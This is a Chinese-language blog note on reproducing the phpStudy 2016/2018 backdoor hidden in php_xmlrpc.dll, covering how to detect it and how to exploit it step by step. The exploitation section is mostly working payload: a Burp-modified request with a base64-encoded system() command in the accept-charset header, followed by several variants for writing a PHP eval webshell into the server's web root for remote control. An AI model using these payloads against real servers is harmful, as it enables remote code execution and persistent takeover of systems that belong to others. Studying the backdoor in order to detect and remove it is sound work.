筆記

前言

如果服務(wù)器是用phpstudy2016或phpstudy2018搭建的，那么就有可能存在后門

發(fā)現(xiàn)漏洞

后門代碼在phpStudy2016和phpStudy2018的php-5.2.17或php-5.4.45的\ext\php_xmlrpc.dll文件中
只要該文件中可以搜索到@eval(%s(‘%s’))，即證明漏洞存在
phpStudy2016路徑

php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路徑

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

后門利用

（1）訪問目標(biāo)服務(wù)器url時，用bp抓包
（2）找到accept-encoding: gzip, deflate，把逗號后面的空格刪掉，改為accept-encoding: gzip,deflate，然后在accept-encoding: gzip,deflate這行前面或后面加上一行accept-charset：c3lzdGVtKCdkaXInKTs=，然后發(fā)送（這里的c3lzdGVtKCdkaXInKTs=是經(jīng)過base64加密的）

這里以windows舉例：
此時可以向目標(biāo)服務(wù)器寫入一句話
（1）dir：查看當(dāng)前目錄下的內(nèi)容，可以一層層查看，最后找到WWW目錄所在，將一句話寫入
（2）chdir：查看當(dāng)前所在目錄，類似于linux中的pwd
（3）利用bp向目標(biāo)系統(tǒng)指定位置寫一句話木馬，^表示寫入特殊字符，例如<或>。寫入后xx.php內(nèi)容為：<?php @eval($_REQUEST[peak);?>
payload:

echo ^<?php @eval($_REQUEST[cmd]);?^> > xx.php

（4）利用bp向目標(biāo)系統(tǒng)指定位置寫一句話木馬，這個不同的是，沒有用到^，寫入后xx.php內(nèi)容為"<?php @eval($_REQUEST[cmd]);?>"，但有"也可使用蟻劍連接
payload：

echo "<?php @eval($_REQUEST[cmd]);?>" > xx.php 注： echo '<?php @eval($_REQUEST[cmd]);?>' > xx.php，也可，寫入后為<?php @eval($_REQUEST[cmd]);?>

（5）假設(shè)目標(biāo)服務(wù)器使用的是phpstudy2018，最后那么payload就是

system('echo ^<?php @eval($_REQUEST[cmd]);?^> > C:\phpStudy\PHPTutorial\WWW\xx.php'); 或 system('echo "<?php @eval($_REQUEST[cmd]);?>" > C:\phpStudy\PHPTutorial\WWW\xx.php');

注：下面寫法會報錯，主要由于""中的變量會執(zhí)行，上面可以是因為system里的整體是’’,表示該整體是字符串
所以system執(zhí)行時，最好使用’’，包含php的代碼的也最好是’'包括

system("echo '<?php @eval($_REQUEST[cmd]);?>' > C:\phpStudy\PHPTutorial\WWW\xx.php");

而如果使用

system("echo \"<?php @eval($_REQUEST[cmd]);?>\" > C:\phpStudy\PHPTutorial\WWW\xx.php");

最后xx.php中為"<?php @eval();?>"，也是""引起的問題

總結(jié)

以上是生活随笔為你收集整理的phpstudy后门漏洞复现的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。